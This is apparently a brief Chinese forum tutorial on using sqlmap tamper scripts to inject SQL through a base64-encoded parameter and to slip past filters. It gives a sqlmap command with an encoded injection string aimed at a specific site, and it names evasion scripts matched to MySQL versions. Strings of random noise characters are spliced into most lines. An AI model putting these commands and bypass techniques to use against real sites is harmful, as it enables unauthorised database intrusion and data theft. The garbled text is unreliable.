WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?3 R; x5 _; f" H( y$ [3 |
! r& N* Q4 |; bsqlmap的tamper里有个base64encode.py' m. Q) A2 c3 i. {: P
% u, N$ j/ z7 b- f0 B2 i; p$ u) q: ?
使用如下
: B) J; e7 y4 G) y& f1 @- X, m
, j) K0 C, C% Q3 J* psqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
, Z2 u7 s$ g& i# h. @9 m9 ?; ~, B! v* K; p$ z
: d2 S( \' _1 y6 K, w% V
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”. }% f0 ~+ |" z
* \9 N# c" A/ K' S0 x o
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:0 p+ l; o* s$ [6 M* {, ]1 U
! M* f$ `* @! T+ xspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
8 K/ a: J% a' Z0 @# ^" G' Wspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入4 Q3 [! a2 h4 E
首先确定目标数据库版本,然后选择相应的脚本。
8 N H+ z' h) q% X* B-v 3 --batch --tamper "space2hash.py"
6 E" t- [) L+ U& N( |
. F' e# e0 A% Y( W还有其他一些插件:. F- o0 b6 K/ h7 t& ~
encodes编码 ——charencode.py+ f4 u$ n' `9 A. c$ J5 N7 Y
base64编码 —— base64encode.py. R, ~9 G& ]% Q4 g. Z& p }
替换空格和关键字 —— halfversionedmorekeywords.py
/ S% \9 b* C8 l$ d% x |
}; Z: `8 l8 u, I& ]" Q9 J: K# _( V
: k6 R, D3 _* P9 f d( C6 K
! O4 r: a5 h8 L& X& y
|